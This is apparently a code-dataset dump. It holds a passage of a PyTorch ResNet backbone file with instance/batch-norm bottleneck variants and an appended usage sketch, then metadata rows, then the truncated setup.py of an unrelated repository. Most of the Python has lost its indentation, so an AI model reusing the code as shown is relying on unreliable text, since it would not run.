self.in2_0 = nn.InstanceNorm2d(planes)
self.conv2_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn2_1 = nn.BatchNorm2d(planes)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3_0 = nn.InstanceNorm2d(planes * 4)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
def forward(self, x):
residual = x
x1 = self.conv1(x)
out1 = self.in1_0(x1)
res1 = x1 - out1
res1 = self.conv1_1(res1)
res1 = self.bn1_1(res1)
res1 = self.relu(res1)
x1 = out1 + res1
x1 = self.bn1(x1)
x1 = self.relu(x1)
x2 = self.conv2(x1)
out2 = self.in2_0(x2)
if self.stride == 2: res1 = self.maxpool(res1)
res2 = x2 - out2 + res1
res2 = self.conv2_1(res2)
res2 = self.bn2_1(res2)
res2 = self.relu(res2)
x2 = out2 + res2
x2 = self.bn2(x2)
x2 = self.relu(x2)
x3 = self.conv3(x2)
x3 = self.bn3(x3)
if self.downsample is not None:
residual = self.downsample(residual)
x3 += residual
x3 = self.relu(x3)
return x3
class SNR3_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(SNR3_Bottleneck, self).__init__()
self.in1 = nn.InstanceNorm2d(planes)
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv1_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn1_1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn2_1 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3 = nn.InstanceNorm2d(planes * 4)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
def forward(self, x, x_2=None, x_1=None, r2=None, r1=None):
if type(x) is tuple:
# print(len(x))
x_2 = x[1]
x_1 = x[2]
r2 = x[3]
r1 = x[4]
x = x[0]
residual = x
x1 = self.conv1(x)
out1 = self.in1(x1)
res1 = x1 - out1
res1 = self.conv1_1(res1)
res1 = self.bn1_1(res1)
res1 = self.relu(res1)
# print(out1.shape)
# print(res1.shape)
# print(x1.shape)
x1 = out1 + res1
x1 = self.bn1(x1)
x1 = self.relu(x1)
x2 = self.conv2(x1)
out2 = self.in1(x2)
res2 = x2 - out2
res2 = self.conv2_1(res2)
res2 = self.bn2_1(res2)
res2 = self.relu(res2)
x2 = out2 + res2
x2 = self.bn2(x2)
x2 = self.relu(x2)
x3 = self.conv3(x2)
x3 = self.bn3(x3)
if self.downsample is not None:
residual = self.downsample(residual)
x3 += residual
x3 = self.relu(x3)
if x_2 is not None: x2 = x2 + x_2
if x_1 is not None: x1 = x1 + x_1
if r2 is not None: res2 = res2 + r2
if r1 is not None: res1 = res1 + r1
'''
print(x3.shape)
print(x2.shape)
print(x1.shape)
print(res2.shape)
print(res1.shape)
'''
if self.stride == 2:
x1 = self.maxpool(x1)
res1 = self.maxpool(res1)
return x3, x2, x1, res2, res1
class SNR4_Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(SNR4_Bottleneck, self).__init__()
self.in1 = nn.InstanceNorm2d(planes)
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv1_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn1_1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2_1 = nn.Conv2d(planes, planes, kernel_size=3,
padding=1, bias=False)
self.bn2_1 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.in3 = nn.InstanceNorm2d(planes * 4)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
def forward(self, x, x_2=None, x_1=None, r2=None, r1=None):
if type(x) is tuple:
# print(len(x))
x_2 = x[1]
x_1 = x[2]
r2 = x[3]
r1 = x[4]
x = x[0]
residual = x
x1 = self.conv1(x)
out1 = self.in1(x1)
res1 = x1 - out1
res1 = self.conv1_1(res1)
res1 = self.bn1_1(res1)
res1 = self.relu(res1)
# print(out1.shape)
# print(res1.shape)
# print(x1.shape)
x1 = out1 + res1
x1 = self.bn1(x1)
x1 = self.relu(x1)
x2 = self.conv2(x1)
out2 = self.in1(x2)
res2 = x2 - out2
res2 = self.conv2_1(res2)
res2 = self.bn2_1(res2)
res2 = self.relu(res2)
x2 = out2 + res2
x2 = self.bn2(x2)
x2 = self.relu(x2)
x3 = self.conv3(x2)
x3 = self.bn3(x3)
if self.downsample is not None:
residual = self.downsample(residual)
x3 += residual
x3 = self.relu(x3)
if x_2 is not None: x2 = x2 + x_2
if x_1 is not None: x1 = x1 + x_1
if r2 is not None: res2 = res2 + r2
if r1 is not None: res1 = res1 + r1
'''
print(x3.shape)
print(x2.shape)
print(x1.shape)
print(res2.shape)
print(res1.shape)
'''
if self.stride == 2:
x1 = self.maxpool(x1)
res1 = self.maxpool(res1)
return x3, x2, x1, res2, res1
# --------------------------------- resnet-----------------------------------
class ResNet(nn.Module):
def __init__(self, last_stride=2, block=Bottleneck, frozen_stages=-1, layers=[3, 4, 6, 3]):
self.inplanes = 64
super().__init__()
print(block)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
# self.relu = nn.ReLU(inplace=True) # add missed relu
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
self.frozen_stages = frozen_stages
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(
block, 512, layers[3], stride=last_stride)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _freeze_stages(self):
if self.frozen_stages >= 0:
self.bn1.eval()
for m in [self.conv1, self.bn1]:
for param in m.parameters():
param.requires_grad = False
for i in range(1, self.frozen_stages + 1):
m = getattr(self, 'layer{}'.format(i))
print('layer{}'.format(i))
m.eval()
for param in m.parameters():
param.requires_grad = False
def forward(self, x, camid=None):
x = self.conv1(x)
x = self.bn1(x)
# x = self.relu(x) # add missed relu
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
return x
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
# ---------------------------------Comb resnet-----------------------------------
class Comb_ResNet(nn.Module):
def __init__(self, last_stride=2, block=Bottleneck, frozen_stages=-1, layers=[3, 4, 6, 3]):
self.inplanes = 64
super().__init__()
print(block)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.in1 = nn.InstanceNorm2d(64)
self.bn1_1 = nn.BatchNorm2d(64)
self.conv2 = nn.Sequential(
nn.Conv2d(128, 64, kernel_size=3, padding=1), nn.BatchNorm2d(64), nn.ReLU(),
nn.Conv2d(64, 64, kernel_size=3, padding=1), nn.BatchNorm2d(64), nn.ReLU(),
nn.Conv2d(64, 64, kernel_size=1)
)
self.in2 = nn.InstanceNorm2d(256)
self.bn2_1 = nn.BatchNorm2d(256)
self.conv3 = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.ReLU(),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.ReLU(),
nn.Conv2d(256, 256, kernel_size=1)
)
self.in3 = nn.InstanceNorm2d(512)
self.bn3_1 = nn.BatchNorm2d(512)
self.conv4 = nn.Sequential(
nn.Conv2d(1024, 512, kernel_size=3, padding=1), nn.BatchNorm2d(512), nn.ReLU(),
nn.Conv2d(512, 512, kernel_size=3, padding=1), nn.BatchNorm2d(512), nn.ReLU(),
nn.Conv2d(512, 512, kernel_size=1)
)
self.in4 = nn.InstanceNorm2d(1024)
self.bn4_1 = nn.BatchNorm2d(1024)
self.conv5 = nn.Sequential(
nn.Conv2d(2048, 1024, kernel_size=3, padding=1), nn.BatchNorm2d(1024), nn.ReLU(),
nn.Conv2d(1024, 1024, kernel_size=3, padding=1), nn.BatchNorm2d(1024), nn.ReLU(),
nn.Conv2d(1024, 1024, kernel_size=1)
)
self.relu = nn.ReLU(inplace=True) # add missed relu
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
self.frozen_stages = frozen_stages
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(
block, 512, layers[3], stride=last_stride)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _freeze_stages(self):
if self.frozen_stages >= 0:
self.bn1.eval()
for m in [self.conv1, self.bn1]:
for param in m.parameters():
param.requires_grad = False
for i in range(1, self.frozen_stages + 1):
m = getattr(self, 'layer{}'.format(i))
print('layer{}'.format(i))
m.eval()
for param in m.parameters():
param.requires_grad = False
def forward(self, x, camid=None):
x = self.conv1(x)
x = self.bn1(x)
# x = self.relu(x) # add missed relu
x = self.maxpool(x)
xin = self.in1(x)
xin = self.bn1_1(xin)
xin = self.relu(xin)
x = self.conv2(torch.cat((xin,x),1))
x = self.layer1(x)
xin = self.in2(x)
xin = self.bn2_1(xin)
xin = self.relu(xin)
x = self.conv3(torch.cat((xin,x),1))
x = self.layer2(x)
xin = self.in3(x)
xin = self.bn3_1(xin)
xin = self.relu(xin)
x = self.conv4(torch.cat((xin,x),1))
x = self.layer3(x)
xin = self.in4(x)
xin = self.bn4_1(xin)
xin = self.relu(xin)
x = self.conv5(torch.cat((xin,x),1))
x = self.layer4(x)
return x
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
# ---------------------------------Pure resnet-----------------------------------
class Pure_ResNet(nn.Module):
def __init__(self, last_stride=2, block=Bottleneck, frozen_stages=-1, layers=[3, 4, 6, 3]):
self.inplanes = 64
super().__init__()
print(block)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
# self.relu = nn.ReLU(inplace=True) # add missed relu
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
self.frozen_stages = frozen_stages
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(
block, 512, layers[3], stride=last_stride)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _freeze_stages(self):
if self.frozen_stages >= 0:
self.bn1.eval()
for m in [self.conv1, self.bn1]:
for param in m.parameters():
param.requires_grad = False
for i in range(1, self.frozen_stages + 1):
m = getattr(self, 'layer{}'.format(i))
print('layer{}'.format(i))
m.eval()
for param in m.parameters():
param.requires_grad = False
def forward(self, x, camid=None):
x = self.conv1(x)
x = self.bn1(x)
#print(camid)
# x = self.relu(x) # add missed relu
x = self.maxpool(x)
if False:
x,_,_,_,_ = self.layer1(x)
x,_,_,_,_ = self.layer2(x)
x,_,_,_,_ = self.layer3(x)
x,_,_,_,_ = self.layer4(x)
else:
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
return x
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
# ---------------------------------jointin resnet-----------------------------------
class Jointin_ResNet(nn.Module):
def __init__(self, last_stride=2, block=SNR3_Bottleneck, frozen_stages=-1, layers=[3, 4, 6, 3]):
self.inplanes = 64
super().__init__()
print(block)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.conv1_1 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.bn1_1 = nn.BatchNorm2d(64)
self.in1 = nn.InstanceNorm2d(64)
# self.relu = nn.ReLU(inplace=True) # add missed relu
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
self.frozen_stages = frozen_stages
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(
block, 512, layers[3], stride=last_stride)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _freeze_stages(self):
if self.frozen_stages >= 0:
self.bn1.eval()
for m in [self.conv1, self.bn1]:
for param in m.parameters():
param.requires_grad = False
for i in range(1, self.frozen_stages + 1):
m = getattr(self, 'layer{}'.format(i))
print('layer{}'.format(i))
m.eval()
for param in m.parameters():
param.requires_grad = False
def forward(self, x, camid=None):
x = self.conv1(x)
x0 = self.in1(x)
'''
res0 = x - x0
res0 = self.conv1_1(res0)
res0 = self.bn1_1(res0)
x0 = x0 + res0
'''
x0 = self.bn1(x0)
# x = self.relu(x) # add missed relu
x0 = self.maxpool(x0)
x1_3, x1_2, x1_1, res1_2, res1_1 = self.layer1(x0)
x2_3, x2_2, x2_1, res2_2, res2_1 = self.layer2(x1_3)
x3_3, x3_2, x3_1, res3_2, res3_1 = self.layer3(x2_3)
x4_3, x4_2, x4_1, res4_2, res4_1 = self.layer4(x3_3)
if self.training:
return x4_3, x4_2, x4_1, res4_2, res4_1, x3_3, x3_2, x3_1, res3_2, res3_1, x2_3, x2_2, x2_1, res2_2, res2_1, x1_3, x1_2, x1_1, res1_2, res1_1
else:
return x4_3
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
# ---------------------------------jointout resnet-----------------------------------
class Jointout_ResNet(nn.Module):
def __init__(self, last_stride=2, block=SNR3_Bottleneck, frozen_stages=-1, layers=[3, 4, 6, 3]):
self.inplanes = 64
super().__init__()
print(block)
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.conv1_res = nn.Sequential(
nn.Conv2d(64, 64, kernel_size=3, padding=1), nn.BatchNorm2d(64), nn.ReLU(inplace = True),
nn.Conv2d(64, 64, kernel_size=3, padding=1), nn.BatchNorm2d(64), nn.ReLU(inplace = True),
nn.Conv2d(64, 64, kernel_size=1)
)
self.in1 = nn.InstanceNorm2d(64)
self.bn1 = nn.BatchNorm2d(64)
self.bn1_1 = nn.BatchNorm2d(64)
self.in2 = nn.InstanceNorm2d(256)
self.bn2_1 = nn.BatchNorm2d(256)
self.bn2_0 = nn.BatchNorm2d(256)
self.in3 = nn.InstanceNorm2d(512)
self.bn3_1 = nn.BatchNorm2d(512)
self.bn3_0 = nn.BatchNorm2d(512)
self.in4 = nn.InstanceNorm2d(1024)
self.bn4_1 = nn.BatchNorm2d(1024)
self.bn4_0 = nn.BatchNorm2d(1024)
self.in5 = nn.InstanceNorm2d(2048)
self.bn5_1 = nn.BatchNorm2d(2048)
self.bn5_0 = nn.BatchNorm2d(2048)
self.relu = nn.ReLU(inplace=True) # add missed relu
self.maxpool = nn.MaxPool2d(kernel_size=2, stride=None, padding=0)
self.frozen_stages = frozen_stages
self.layer1 = self._make_layer(block, 64, layers[0])
self.conv2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1,
bias=False)
self.conv2_res = nn.Sequential(
nn.Conv2d(256, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.ReLU(inplace = True),
nn.Conv2d(128, 128, kernel_size=3, padding=1), nn.BatchNorm2d(128), nn.ReLU(inplace = True),
nn.Conv2d(128, 256, kernel_size=1)
)
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.conv3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1,
bias=False)
self.conv3_res = nn.Sequential(
nn.Conv2d(512, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.ReLU(inplace = True),
nn.Conv2d(256, 256, kernel_size=3, padding=1), nn.BatchNorm2d(256), nn.ReLU(inplace = True),
nn.Conv2d(256, 512, kernel_size=1)
)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.conv4 = nn.Conv2d(1024, 1024, kernel_size=3, stride=1, padding=1,
bias=False)
self.conv4_res = nn.Sequential(
nn.Conv2d(1024, 512, kernel_size=3, padding=1), nn.BatchNorm2d(512), nn.ReLU(inplace = True),
nn.Conv2d(512, 512, kernel_size=3, padding=1), nn.BatchNorm2d(512), nn.ReLU(inplace = True),
nn.Conv2d(512, 1024, kernel_size=1)
)
self.layer4 = self._make_layer(block, 512, layers[3], stride=last_stride)
self.conv5 = nn.Conv2d(2048, 2048, kernel_size=3, stride=1, padding=1,
bias=False)
self.conv5_res = nn.Sequential(
nn.Conv2d(2048, 1024, kernel_size=3, padding=1), nn.BatchNorm2d(1024), nn.ReLU(inplace = True),
nn.Conv2d(1024, 1024, kernel_size=3, padding=1), nn.BatchNorm2d(1024), nn.ReLU(inplace = True),
nn.Conv2d(1024, 2048, kernel_size=1)
)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _freeze_stages(self):
if self.frozen_stages >= 0:
self.bn1.eval()
for m in [self.conv1, self.bn1]:
for param in m.parameters():
param.requires_grad = False
for i in range(1, self.frozen_stages + 1):
m = getattr(self, 'layer{}'.format(i))
print('layer{}'.format(i))
m.eval()
for param in m.parameters():
param.requires_grad = False
def forward(self, x, camid=None):
x = self.conv1(x)
x0 = self.in1(x)
res0 = x - x0
x0 = self.bn1(x0)
x0 = self.relu(x0)
res0 = self.conv1_res(res0)
x0 = x0 + res0
x0 = self.bn1_1(x0)
# x = self.relu(x) # add missed relu
x0 = self.maxpool(x0)
x1 = self.layer1(x0)
px1 = self.conv2(x1)
x1 = self.in2(px1)
res1 = px1 - x1
x1 = self.bn2_0(x1)
x1 = self.relu(x1)
res1 = self.conv2_res(res1)
x1 = x1 + res1
x1 = self.bn2_1(x1)
x1 = self.relu(x1)
x2 = self.layer2(x1)
px2 = self.conv3(x2)
x2 = self.in3(px2)
res2 = px2 - x2
x2 = self.bn3_0(x2)
x2 = self.relu(x2)
res2 = self.conv3_res(res2)
x2 = x2 + res2
x2 = self.bn3_1(x2)
x2 = self.relu(x2)
x3 = self.layer3(x2)
px3 = self.conv4(x3)
x3 = self.in4(px3)
res3 = px3 - x3
x3 = self.bn4_0(x3)
x3 = self.relu(x3)
res3 = self.conv4_res(res3)
x3 = x3 + res3
x3 = self.bn4_1(x3)
x3 = self.relu(x3)
x4 = self.layer4(x3)
px4 = self.conv5(x4)
x4 = self.in5(px4)
res4 = px4 - x4
x4 = self.bn5_0(x4)
x4 = self.relu(x4)
res4 = self.conv5_res(res4)
x4 = x4 + res4
x4 = self.bn5_1(x4)
x4 = self.relu(x4)
if self.training:
return x0, x1, x2, x3, x4, res0, res1, res2, res3, res4
else:
return x4
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict:
if 'fc' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
def random_init(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
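# --- Hedged usage sketch (not part of the original file) ---
# Builds the plain ResNet-50 backbone defined above and runs a dummy batch;
# the 256x128 input resolution is an assumption for illustration only.
if __name__ == '__main__':
    net = ResNet(last_stride=1, block=Bottleneck, layers=[3, 4, 6, 3])
    net.random_init()
    feat = net(torch.randn(2, 3, 256, 128))
    # conv1, maxpool, layer2 and layer3 each halve the resolution; with last_stride=1
    # the output stays at 1/16 of the input: (2, 2048, 16, 8)
    print(feat.shape)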
|
Python
| 1,100
| 34.375454
| 153
|
/model/backbones/resnet.py
| 0.533126
| 0.481754
|
ariksu/pyhfss_parser
|
refs/heads/master
|
from setuptools import setup
setup(
name='pyhfss_parser',
version='0.0.0',
packages=['', 'venv.Lib.site-packages.py', 'venv.Lib.site-packages.py._io', 'venv.Lib.site-packages.py._log',
'venv.Lib.site-packages.py._code', 'venv.Lib.site-packages.py._path',
'venv.Lib.site-packages.py._process', 'venv.Lib.site-packages.py._vendored_packages',
'venv.Lib.site-packages.pip', 'venv.Lib.site-packages.pip._vendor',
'venv.Lib.site-packages.pip._vendor.idna', 'venv.Lib.site-packages.pip._vendor.pytoml',
'venv.Lib.site-packages.pip._vendor.certifi', 'venv.Lib.site-packages.pip._vendor.chardet',
'venv.Lib.site-packages.pip._vendor.chardet.cli', 'venv.Lib.site-packages.pip._vendor.distlib',
'venv.Lib.site-packages.pip._vendor.distlib._backport', 'venv.Lib.site-packages.pip._vendor.msgpack',
'venv.Lib.site-packages.pip._vendor.urllib3', 'venv.Lib.site-packages.pip._vendor.urllib3.util',
'venv.Lib.site-packages.pip._vendor.urllib3.contrib',
'venv.Lib.site-packages.pip._vendor.urllib3.contrib._securetransport',
'venv.Lib.site-packages.pip._vendor.urllib3.packages',
'venv.Lib.site-packages.pip._vendor.urllib3.packages.backports',
'venv.Lib.site-packages.pip._vendor.urllib3.packages.ssl_match_hostname',
'venv.Lib.site-packages.pip._vendor.colorama', 'venv.Lib.site-packages.pip._vendor.html5lib',
'venv.Lib.site-packages.pip._vendor.html5lib._trie',
'venv.Lib.site-packages.pip._vendor.html5lib.filters',
'venv.Lib.site-packages.pip._vendor.html5lib.treewalkers',
'venv.Lib.site-packages.pip._vendor.html5lib.treeadapters',
'venv.Lib.site-packages.pip._vendor.html5lib.treebuilders', 'venv.Lib.site-packages.pip._vendor.lockfile',
'venv.Lib.site-packages.pip._vendor.progress', 'venv.Lib.site-packages.pip._vendor.requests',
'venv.Lib.site-packages.pip._vendor.packaging', 'venv.Lib.site-packages.pip._vendor.cachecontrol',
'venv.Lib.site-packages.pip._vendor.cachecontrol.caches',
'venv.Lib.site-packages.pip._vendor.webencodings', 'venv.Lib.site-packages.pip._vendor.pkg_resources',
'venv.Lib.site-packages.pip._internal', 'venv.Lib.site-packages.pip._internal.req',
'venv.Lib.site-packages.pip._internal.vcs', 'venv.Lib.site-packages.pip._internal.utils',
'venv.Lib.site-packages.pip._internal.models', 'venv.Lib.site-packages.pip._internal.commands',
'venv.Lib.site-packages.pip._internal.operations', 'venv.Lib.site-packages.attr',
'venv.Lib.site-packages.pluggy', 'venv.Lib.site-packages._pytest', 'venv.Lib.site-packages._pytest.mark',
'venv.Lib.site-packages._pytest._code', 'venv.Lib.site-packages._pytest.config',
'venv.Lib.site-packages._pytest.assertion', 'venv.Lib.site-packages.colorama',
'venv.Lib.site-packages.atomicwrites', 'venv.Lib.site-packages.parsimonious',
'venv.Lib.site-packages.parsimonious.tests', 'venv.Lib.site-packages.more_itertools',
'venv.Lib.site-packages.more_itertools.tests', 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.req',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.vcs',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.utils',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.compat',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.models',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.distlib',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.distlib._backport',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.colorama',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib._trie',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.filters',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treewalkers',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treeadapters',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treebuilders',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.lockfile',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.progress',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.chardet',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.util',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.contrib',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.packages',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.packages.ssl_match_hostname',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.packaging',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.cachecontrol',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.cachecontrol.caches',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.webencodings',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.pkg_resources',
